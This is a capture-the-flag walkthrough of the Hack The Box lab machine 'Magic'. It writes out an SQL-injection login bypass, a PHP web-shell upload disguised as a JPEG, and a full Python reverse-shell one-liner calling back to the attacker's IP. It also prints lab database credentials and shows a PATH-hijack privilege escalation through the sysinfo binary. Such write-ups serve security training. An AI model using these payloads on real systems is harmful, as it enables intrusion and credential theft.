HTB Walkthrough Magic 10.10.10.185

Enumeration
Nmap Scan
nmap -sV -sC 10.10.10.185

Web page

After this I ran gobuster, in order to enumerate the web page for files and directories.
gobuster dir -u http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt.html
We see some interesting pages:
upload.php
login.php
The login page.

Bypassing Login Page
We can bypass this login page, by SQL injection.
Resource: https://portswigger.net/support/using-sql-injection-to-bypass-authentication
Username: ‘ or ”=’
Password: ‘ or ”=’
After we have logged into the website, we see an upload page. Where we can upload an image.

Exploitation
I tried simple uploading bypass to add .jpg at the end of the file.

When I try to upload the image, I get the following banner.

After some trying some stuff, I found the following recourse:
https://github.com/jgor/php-jpeg-shell/blob/master/shell.php
I download it to my system.

If we can upload this, then we have an LFI.
First, we need to add .jpg extension at the end.
mv shell.php shell.php.jpg
We upload the image.

Uploaded it successfully.
Now we need to find where the file is uploaded.
gobuster dir -u http://10.10.10.185/images -w /home/kali/Desktop/wordlists/dirbuster/directory-list-2.3-medium.txt
The place where the file is uploaded to is /images/uploads.

Now we have code execution.
gobuster dir -u http://10.10.10.185/images -w /home/kali/Desktop/wordlists/dirbuster/directory-list-2.3-medium.txt

The place where the file is uploaded to is /images/uploads.
http://10.10.10.185/images/uploads/shell.php.jpg

Now we have code execution.

Getting Reverse Shell
In order to get a reverse shell I used the following code.
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.12”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

We can read the user.txt yet, we need to find credentials for the user theseus.

I found credentials in /var/www/Magic/db.php5
The credentials are:
Theseus: iamkingtheseus
I couldn’t login with these credentials.

Because these credentials are from a SQL database, I tried to dump the SQL database.
mysqldump -utheseus -piamkingtheseus Magic

Now I have found new credentials.
admin:Th3s3usW4sK1ng
I couldn’t login with admin: Th3s3usW4sK1ng, but I could login with:
theseus:Th3s3usW4sK1ng
whoami && ifconfig && cat user.txt; echo

Post-Exploitation
Running enumeration script: lse.sh
Kali System:
python3 -m http.server 80
Target System:
wget http://10.10.14.12/lse.sh

In order to run the script.
bash lse.sh

We see an unusual binary.
/bin/sysinfo
Creating a fake lswh and disk
What sysinfo does: it reads the hardware configuration of the system such as Memory Size, CPU etc.
Resource: https://www.exploit-db.com/exploits/44150
What we need to do is the following:
- Create a lswh file with contains of a reverse shell.
- Then set our path to that lswh file
- Run the sysinfo command and we got root.
Reverse Shell inside The File
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.12”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Setting Our Path
export PATH=/tmp/IceL0rd:$PATH


Getting Root Shell
sysinfo

whoami && ifconfig && cat root.txt; echo

Made by: IceL0rd
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.